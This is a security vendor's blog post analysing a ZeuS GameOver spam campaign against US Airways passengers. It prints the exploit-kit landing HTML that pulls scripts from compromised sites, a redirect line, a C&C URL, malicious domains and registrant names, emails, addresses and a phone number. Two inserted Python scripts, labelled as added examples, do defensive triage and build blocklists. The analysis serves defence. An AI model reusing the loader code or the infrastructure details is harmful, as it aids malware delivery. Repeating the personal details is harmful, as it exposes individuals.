
A gift from ZeuS for passengers of US Airways

Dmitry Tarakanov
Kaspersky Lab Expert
Posted April 03, 12:58 GMT
Tags: ZeuS

Spam

On 20 March, we detected a spam campaign targeting passengers of US Airways. For almost the entire week, cybercriminals were sending users the following email, allegedly from US Airways:

The email gives a brief description of the check-in procedure and provides a confirmation code for the online reservation.

The criminals are clearly banking on recipients who are actually booked on the flight mentioned in the email clicking on the link "Online reservation details".

Different emails contained different links — for example, we noticed the following domains: sulichat.hu, prakash.clanteam.com, panvelkarrealtors.com.

After clicking the link, a series of redirects eventually leads to a domain hosting the BlackHole Exploit Kit.

BlackHole Exploit Kit: redirections and infection

A typical BlackHole infection routine is used to infect users’ computers.
The first port of call after clicking the link in the email is a page with the following html code:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://boemelparty.be/<removed>/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/<removed>/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.vinhthanh.com.vn/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/<removed>/js.js"></script>
<script type="text/javascript" src="http://www.thedugoutdawgs.com/<removed>/js.js"></script>
</html>

As a result, JavaScript files are loaded into the user’s browser from several different domains. Each of them contains a single command such as document.location='http://indigocellular.com/', which redirects the user to a page containing another, obfuscated, JavaScript.

This JavaScript’s job is to insert links into the HTML code of the page that lead to the object carrying the exploit. So far, we’ve detected three types of objects: a JAR file, an SWF file and a PDF document. Each object exploits a vulnerability in the respective application (Java, Flash Player or Adobe Reader) to execute malicious code on the targeted system. If a vulnerable version of even one of those applications is in use, the attack ends in infection: the malicious executable is downloaded and run on the user’s system.

Malicious JAR, SWF and PDF documents are loaded from different domains — e.g. indigocellular.com, browncellular.com, bronzecellular.com (registration details are given at the end of this post) — under the names Qai.jar, field.swf, dea86.pdf, 11591.pdf.
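The chain described above (a first-hop page that pulls in several remote scripts, each of which is nothing but a document.location redirect, followed by an obfuscated page that injects references to JAR, SWF and PDF objects) is easy to triage mechanically once you have the captured pages. The following Python script is an added example and is not Kaspersky Lab's code or part of the original post. It takes the first-hop HTML, the bodies of the scripts it loads and a de-obfuscated second-hop page, and reports the remote script loaders, the redirect-only scripts and the exploit-carrying objects. The page contents are constructed: the REMOVED-PATH directory segment, the host example-first-hop.invalid and the benign analytics.js control are all stand-ins, and the second-hop markup is only a plausible shape of what the obfuscated script injects, not a captured page.

```python
"""Triage helper for a BlackHole-style redirect chain (added example; not
Kaspersky Lab code). Reports the remote script loaders on a first-hop page,
which of those scripts are redirect-only, and which JAR/SWF/PDF objects
the de-obfuscated second-hop page references."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed first-hop page modelled on the one in the post. The real
# directory names were removed in the write-up, so REMOVED-PATH stands in.
LANDING_HTML = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="http://boemelparty.be/REMOVED-PATH/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/REMOVED-PATH/js.js"></script>
<script type="text/javascript" src="/local/analytics.js"></script>
</html>"""

# Constructed script bodies keyed by URL: two redirect-only loaders of the
# kind the post describes, plus a benign control that must not be flagged.
SCRIPT_BODIES = {
    "http://boemelparty.be/REMOVED-PATH/js.js": "document.location='http://indigocellular.com/'",
    "http://nhb.prosixsoftron.in/REMOVED-PATH/js.js": "document.location='http://browncellular.com/'",
    "/local/analytics.js": "function track(){ return 1; }",
}

# Constructed second-hop page as it might look after de-obfuscation: the
# injected markup that pulls the exploit objects named in the post.
SECOND_HOP_HTML = """<html><body>
<applet archive="http://indigocellular.com/Qai.jar" code="Qai.class"></applet>
<embed src="http://browncellular.com/field.swf" type="application/x-shockwave-flash">
<iframe src="http://bronzecellular.com/dea86.pdf" width="1" height="1"></iframe>
<img src="http://bronzecellular.com/logo.png">
</body></html>"""

EXPLOIT_EXTENSIONS = (".jar", ".swf", ".pdf")

# A script whose entire body is one location assignment and nothing else.
REDIRECT_ONLY = re.compile(
    r"^\s*(?:window\.|document\.)?location(?:\.href)?\s*=\s*['\"]([^'\"]+)['\"]\s*;?\s*$"
)


class _RefCollector(HTMLParser):
    """Collect script src values and URL attributes of object-like tags."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.objects = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script" and a.get("src"):
            self.scripts.append(a["src"])
        elif tag in ("applet", "embed", "object", "iframe"):
            for key in ("archive", "src", "data"):
                if a.get(key):
                    self.objects.append(a[key])


def _collect(html):
    p = _RefCollector()
    p.feed(html)
    p.close()
    return p


def remote_scripts(html, page_host):
    """Script sources served from a host other than the page's own."""
    return [s for s in _collect(html).scripts
            if urlparse(s).hostname not in (None, page_host)]


def redirect_targets(script_bodies):
    """Map script URL -> destination for scripts that only redirect."""
    out = {}
    for url, body in script_bodies.items():
        m = REDIRECT_ONLY.match(body)
        if m:
            out[url] = m.group(1)
    return out


def exploit_objects(html):
    """Embedded object URLs whose file extension matches an exploit carrier."""
    return [u for u in _collect(html).objects
            if urlparse(u).path.lower().endswith(EXPLOIT_EXTENSIONS)]


def triage(landing_html, page_host, script_bodies, second_hop_html):
    """Summarise the chain from first hop to exploit objects."""
    return {
        "remote_scripts": remote_scripts(landing_html, page_host),
        "redirects": redirect_targets(script_bodies),
        "exploit_objects": exploit_objects(second_hop_html),
    }


if __name__ == "__main__":
    for key, value in triage(LANDING_HTML, "example-first-hop.invalid",
                             SCRIPT_BODIES, SECOND_HOP_HTML).items():
        print(key, value)
```

The useful signal for a detection rule is the combination, not any single part: a page with no content of its own that loads several cross-domain scripts, each of which does nothing except assign document.location, is a much stronger indicator than a lone redirect. The extension check on the second hop is deliberately narrow to the three carriers the post names; widen it only when you have confirmed other object types in your own captures.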

We detect these exploits as:
Exploit.Java.CVE-2011-3544.mz
Exploit.SWF.Agent.gd
Exploit.JS.Pdfka.fof

After successfully exploiting vulnerabilities, an executable file is downloaded from the same domains where the exploits are located. It can be downloaded under different names — about.exe, contacts.exe and others — and is essentially a downloader. When the downloader runs, it connects to its C&C at the URL “176.28.18.135/pony/gate.php”, and downloads and runs another malicious program – ZeuS/ZBot or, to be more precise, a modification of one of the development branches of that Trojan known as ‘GameOver’ – on the user’s system.

ZeuS is downloaded from hacked sites such as:
cinecolor.com.ar
bizsizanayasaolmaz.org
cyrpainting.cl
hellenic-antiaging-academy.gr
elektro-pfeffer.at
grupozear.es
sjasset.com

Polymorphism

At all the stages of this attack, every object — domains, links to javascripts, files with exploits, the downloader and ZeuS — was frequently replaced with a new one. The domains remained "alive" for nearly 12 hours, while the ZeuS samples were replaced more often.

During the short periods of time (a few hours over several days) that I was monitoring what files were being downloaded, I managed to detect 6 modifications of the downloader and 3 modifications of ZeuS.

To recap: a modification comprises all the samples that are detected with the same verdict, so the number of detected programs is usually larger than the number of verdicts.

Downloader verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx
Trojan-PSW.Win32.Fareit.oo
Trojan-PSW.Win32.Fareit.pb
Trojan.Win32.Jorik.Downloader.ams

Total number of programs detected with these verdicts: 250.

ZeuS verdicts:
Trojan-Dropper.Win32.Injector.dpdj
Trojan-Dropper.Win32.Injector.dpsk
Trojan-Dropper.Win32.Injector.dqwx

Total number of samples detected with these verdicts: 127.

As I have already mentioned, these were only the verdicts I managed to record. There were undoubtedly more modifications throughout the course of this particular spam campaign.

Botnet identifiers

It wasn’t just the ZeuS wrapper (packer, anti-emulation) that was being changed; the malicious program itself was being recompiled. ZeuS contains a hardcoded botnet ID string and a number of IP addresses that the malicious program tries to connect to following infection. This data was modified over time as well. Judging by the numbers of detected and analyzed samples, we can assume that ZeuS was being recompiled at every second repacking.

Having analyzed 48 versions of the different modifications of ZeuS that were used by cybercriminals in this attack, I discovered 19 unique botnet identifiers:

chinz22
chinz24
blk25
mmz22
mmz24
mmz25
molotz25
NR22
NR23
NR24
NR25
ppcz22
ppcz23
ppcz24
rnato25
rubz22
rubz23
rubz24
zuu

In contrast to the conventional ZeuS program, which usually contains a single URL from which to download a configuration file, each sample of GameOver has 20 hardcoded IP addresses with ports. Having infected the victim’s computer, GameOver tries to establish a connection to those addresses in order to announce itself to the botnet, retrieve information (e.g. web injects) and send data stolen from the victim.

Of the 960 IP addresses contained in the 48 analyzed samples, just 157 are unique.
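The bookkeeping behind the two paragraphs above (20 peers per sample, 48 samples, 960 slots, 157 unique addresses, 19 botnet IDs) is the kind of thing worth scripting once you are pulling the peer list and botnet ID out of each sample. The Python below is an added example, not Kaspersky Lab's code or part of the original post. It works on constructed extractions: three peers per sample instead of 20, addresses from the RFC 5737 documentation range 192.0.2.0/24 rather than the real list, and botnet IDs taken from the list in the post. It deduplicates the peer set, groups peers by botnet ID, flags peers reused across botnet IDs, links samples that share any peer into clusters, and ranks peers by how many samples reference them, which is the order in which you would want them in a blocklist.

```python
"""Bookkeeping over per-sample GameOver C2 extractions (added example; not
Kaspersky Lab code). Deduplicates the peer list, groups peers by botnet ID,
finds peers shared across botnet IDs, links samples that share peers, and
ranks peers by how many samples referenced them."""
from collections import defaultdict

# Constructed extractions: three peers per sample instead of the 20 the post
# reports, addresses from the RFC 5737 documentation range 192.0.2.0/24,
# botnet IDs taken from the post's list. None of these are real indicators.
SAMPLES = {
    "sample_a": {"botnet_id": "rubz22",
                 "peers": ["192.0.2.10:8080", "192.0.2.11:8080", "192.0.2.12:443"]},
    "sample_b": {"botnet_id": "rubz22",
                 "peers": ["192.0.2.11:8080", "192.0.2.13:443", "192.0.2.14:8080"]},
    "sample_c": {"botnet_id": "NR24",
                 "peers": ["192.0.2.20:443", "192.0.2.21:443", "192.0.2.12:443"]},
    "sample_d": {"botnet_id": "zuu",
                 "peers": ["192.0.2.30:8080", "192.0.2.31:8080", "192.0.2.32:8080"]},
}


def total_peer_slots(samples):
    """Sum of per-sample list lengths (the '960' in the post)."""
    return sum(len(s["peers"]) for s in samples.values())


def unique_peers(samples):
    """Distinct ip:port strings across all samples (the '157')."""
    return {p for s in samples.values() for p in s["peers"]}


def peers_by_botnet_id(samples):
    """Botnet ID -> set of peers carried by any sample with that ID."""
    out = defaultdict(set)
    for s in samples.values():
        out[s["botnet_id"]].update(s["peers"])
    return dict(out)


def peers_shared_across_botnet_ids(samples):
    """Peers that appear under more than one botnet ID: infrastructure
    reused between sub-botnets, worth a closer look."""
    owners = defaultdict(set)
    for s in samples.values():
        for p in s["peers"]:
            owners[p].add(s["botnet_id"])
    return {p for p, ids in owners.items() if len(ids) > 1}


def link_samples_by_shared_peers(samples):
    """Union-find over samples: two samples join a cluster if any peer
    appears in both lists. Returns clusters as sets of sample names."""
    parent = {name: name for name in samples}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]   # path halving
            x = parent[x]
        return x

    first_seen = {}
    for name, s in samples.items():
        for p in s["peers"]:
            if p in first_seen:
                ra, rb = find(first_seen[p]), find(name)
                if ra != rb:
                    parent[rb] = ra
            else:
                first_seen[p] = name
    clusters = defaultdict(set)
    for name in samples:
        clusters[find(name)].add(name)
    return sorted(clusters.values(), key=lambda c: sorted(c))


def blocklist(samples):
    """(peer, sample_count) sorted by count descending, then by peer."""
    counts = defaultdict(int)
    for s in samples.values():
        for p in set(s["peers"]):
            counts[p] += 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    print(total_peer_slots(SAMPLES), "slots,", len(unique_peers(SAMPLES)), "unique")
    print("shared across IDs:", peers_shared_across_botnet_ids(SAMPLES))
    print("clusters:", link_samples_by_shared_peers(SAMPLES))
    for peer, n in blocklist(SAMPLES)[:3]:
        print(peer, n)
```

In the constructed data sample_c carries a different botnet ID from sample_a but shares one peer with it, so the two land in the same cluster; with real extractions, that overlap between botnet IDs is the part of the output that tells you the sub-botnets share infrastructure rather than merely a code base. Because peer lists rotate between builds, rerun the script as new samples arrive and diff the blocklist rather than treating any one run as final.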


Attack geography

I presume that during this time spam emails with links to confirm US Airways flight reservations were not the only method used to spread ZeuS. Cybercriminals are nothing if not original. And even though this is not the first time they’ve used a flight-related trick, it’s the first time this particular kind of spam has been detected. If the recipients belong to a target audience, they are much more likely to click on a malicious link in an email. However, the majority of users who received these emails were not flying anywhere that day, which is why very few fell for the scam.

Obviously, during the period under review other spam emails were also being sent containing links that led to the same sites, the same exploits and the same malicious executables mentioned above. I took a look at where the threats that were related in one way or another to this attack were detected by our users. Below you can see a geographical breakdown of the detected exploits, downloaders and ZeuS modifications used by the cybercriminals in this attack:

Country     Share of detections
Russia      32.8%
USA         10.3%
Italy        9.2%
Germany      8.6%
India        6.9%
France       3.8%
Ukraine      3.6%
Poland       3.2%
Brazil       3.1%
Malaysia     3%
Spain        2.9%
China        2.7%


P.S. Here’s some information about the domains used in the spam campaign described above (it’s not the first time these registration details have been used to register domains involved in propagating malicious software via spam):

indigocellular.com (209.59.218.102)
Registrant: Nicholas Guzzardi, clarelam@primasia.com
5536 Gold Rush Dr. NW
87120 Albuquerque
United States
Tel: +1.5053505497

browncellular.com (174.140.168.207)
Registrant: Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US

bronzecellular.com (96.9.151.220)
Registrant: Renee Fabian, clarelam@primasia.com
2840 Center Port Circle
Pompano Beach, FL 33064
US



1 comment

mjw

2012 Apr 03, 20:36

Ticket_American_Airlines_ID115-74-14.exe

I stumbled across MD5 (.//event_7,069,405/Ticket_American_Airlines_ID115-74-14.exe) = 85d4c479be69dc532abb9132b4f63816 several days ago. Based on file names, these attacks might be related. The file is UPX packed and drops a VB executable. Callback is to ofalaskas14.ru (213.152.180.180). File was dropped from 194.8.253.11
